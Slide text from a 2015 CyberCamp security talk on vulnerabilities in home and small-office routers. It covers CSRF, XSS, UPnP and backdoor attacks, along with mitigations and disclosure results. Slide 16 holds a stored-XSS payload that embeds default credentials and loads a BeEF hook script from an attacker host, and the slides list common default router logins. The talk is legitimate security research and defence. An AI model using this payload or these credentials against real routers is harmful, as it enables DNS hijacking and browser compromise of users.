Ponencia CyberCamp 2015

2. Swords & Shields
SOHO Routers:
Álvaro Folgado, José Antonio Rodríguez, Iván Sanz

3. About us…
3
Meet our research group
Álvaro Folgado
Rueda
Independent Researcher
José Antonio
Rodríguez García
Independent Researcher
Iván Sanz de Castro
Security Analyst at
Wise Security Global.

4. The talk
Mitigations
4
Vulnerabilities & Attacks
Keys

5. Real World Attacks
 Example 1 – Dictionary for DNS Hijacking via CSRF
5

6. Real World Attacks
 Example 2 – Phishing website
6

7. Real World Attacks
7
 Example 3 – Linux/Moose Malware

8. Common security problems
 Services
 Too many. Mostly useless.
□Increases attack surfaces
 Insecure
8

9. Common security problems
 Default credentials
 Public and well-known for each model
 Non randomly generated
 Hardly ever modified by users
9
45%
27%
5%
5%
18%
User / Password
1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone

10. Common security problems
 Multiple user accounts
 Also with public default credentials
 Mostly useless for users
 Almost always hidden for end-users
□Passwords for these accounts are never changed
10

11. 11
Swords

12. Bypass Authentication
 Allows unauthenticated attackers to carry out router
configuration changes
 Locally and remotely
 Exploits:
 Improper file permissions: Web configuration interface
 Service misconfiguration: SMB and Twonky Media Server
12
 Persistent DoS / Restore router to default
settings without requiring authentication
 Exploiting the Twonky Media Server
Video Demos #1 & #2

13. Cross Site Request Forgery
 Change any router configuration settings by sending
a specific malicious link to the victim
 Main goal
 DNS Hijacking
 Requires embedding login credentials in the
malicious URL
 Attack feasible if credentials have never been changed
 Google Chrome does not pop-up warning
13

14. Cross Site Request Forgery
 Suspicious link, isn't it?
 URL Shortening Services
 Create a malicious website
14

15. Persistent Cross Site Scripting
 Inject malicious script code within the web
configuration interface
 Goals
 Session Hijacking
 Browser Infection
15

16. Persistent Cross Site Scripting
 Browser Exploitation Framework is a great help
 Input field character length limitation
 BeEF hooks link to a more complex script file hosted by the
attacker
http://1234:1234@192.168.1.1/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
16

17. Unauthenticated Cross Site Scripting
 Script code injection is performed locally without
requiring any login process
 Send a DHCP Request PDU containing the malicious
script within the hostname parameter
 The malicious script is injected within Connected
Clients (DHCP Leases) table
17

18. Unauthenticated Cross Site Scripting
18

19. Unauthenticated Cross Site Scripting
 Always try harder
19

20. Privilege Escalation
 User without administrator rights is able to escalate
privileges and become an administrator
 Shows why multiple user accounts are unsafe
20
 Privilege Escalation via FTP
Video Demo #3

21. Backdoor
 Hidden administrator accounts
 Completely invisible to end users
 But allows attackers to change any configuration setting
21

22. Information Disclosure
 Obtain critical information without requiring any
login process
 WLAN password
 Detailed list of currently connected clients
 Hints about router's administrative password
 Other critical configuration settings
22

23. Information Disclosure
23

24. Universal Plug and Play
 Enabled by default on several router models
 Allows application to execute network configuration
changes such as opening ports
 Extremely insecure protocol
 Lack of an authentication process
 Awful implementations
 Main goals
 Open critical ports for remote WAN hosts
 Persistent Denial of Service
 Carry out other configuration changes
24

25. Universal Plug and Play
 Locally
 Miranda UPnP tool
25

26. Universal Plug and Play
 Remotely
 Malicious SWF file
26

27. Attack vectors
 Locally
 Attacker is connected to the victim's LAN either using an
Ethernet cable or wirelessly
 Remotely
 The attacker is outside of the victim's LAN
27

28. Social Engineering is your friend
 For link-based remote attacks
 XSS, CSRF and UPnP
 Social Networks = Build the easiest botnet ever!
 Phishing emails = Targeted attacks
28

29. 29
 DNS Hijacking via CSRF
Live Demo #1
 Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #2
 Reflected XSS + client-side attack to get Reverse Shell
Live Demo #3
 Bypass Authentication using SMB Symlinks
Live Demo #4

30. 30
 Using a Reflected Cross Site Scripting to get a Reverse
Shell on victim's computer
 Exploits an Internet Explorer client-side vulnerability:
CVE-2012-1876
Live Demo #3: Details

31. 31
Shields

32. Mitigations: End users
 Users start with a broken shield
 Limited configuration settings
 Several attacks cannot be stopped
 Mitigations only work for specific models
 Not as easy as buying a brand new router
 No antivirus is going to protect you
32

33. Mitigations: End users
 Where to start?
 Identify your router model
 Look for router credentials
 Get into the advanced configuration interface
33

34. Mitigations: End users
 General recommendations
 Only log into the web interface when needed
□ Logout (if possible) / Wipe browser's cache after finishing
 Change your router's administrative password
34

35. Mitigations: End users
 General recommendations
 Check your DNS servers on a weekly basis
35

36. Mitigations: End users
 General recommendations
 Do not trust shortened links
 Be careful when browsing the web interface
36

37. Mitigations: End users
 Multiple user accounts
 Try to delete any other administrative account
 At least, change their passwords, if possible
37

38. Video Demo #4
 Mitigating Privilege Escalation and
account-related attacks
38

39. Mitigations: End users
 Services
 Disable any unused service if given the chance
□FTP and SMB
□Media Servers: Twonky
□UPnP
□If local risk, DHCP
 It does not always work…
39

40. Mitigations: End users
 Firmware
 Update to the latest version
□Manufacturer might have not fixed any issues
 How?
40

41. Mitigations: End users
 Custom Firmware Images
 For advanced users
 More configuration settings
 Might have security flaws as well
41

42. Mitigations: Manufacturers
 Listen to what security researchers have to say
 Do not include useless services
 Specially for ISP SOHO routers
 At least, make it feasible to completely shut them down
 Critical ports closed to WAN by default
 At least 21, 22, 23, 80 and 8000/8080
42

43. Mitigations: Manufacturers
 Do not include multiple user accounts
 Design a safer alternative to UPnP
 Avoid using unsafe protocols
 HTTP. Telnet. FTP. HTTPS. SSH. SFTP.
 Randomly generate user credentials
43
Admin
Password
Serial
Number
MAC
Address
Manufact.
Date

44. Mitigations: Manufacturers
 XSS
 Check every input field within router's web interface
 Sanitize DHCP hostname parameters
 Content Security Policies
44

45. Mitigations: Manufacturers
 CSRF
 Tokens… that work
45

46. Mitigations: Manufacturers
 Bypass Authentication & Information Disclosure
 Check for improper file permissions and public debug
messages
 Service-related
 Check for possible wrong service configuration (e.g.: FTP,
SMB)
46

47. 47
Keys

48. Developed tools
48

49. Manufacturers' response
 Average 2-3 emails sent to each manufacturer
 Most of them unreplied... 7 months later
 Number of vulnerabilities fixed: 0
49

50. Responsible Disclosure
50

51. Results
 More than 60 vulnerabilities have been discovered
 22 router models affected
 11 manufacturers affected
51

52. 52
0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per
manufacturer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers

53. 53
21%
15%
20%
8%
2%
3%
2%
6%
23%
XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities
by types

54. Conclusion
 Has SOHO router security
improved?
 Hell NO!
 Serious security problems
 Easy to exploit
 With huge impact
 Millions of users affected
 PLEASE, START FIXING
SOHO ROUTER SECURITY
54

55. 55
Álvaro Folgado Rueda · alvfolrue@gmail.com
José A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
Thank you!
Q&A Time

56. https://cybercamp.es @CyberCampEs#CyberCamp15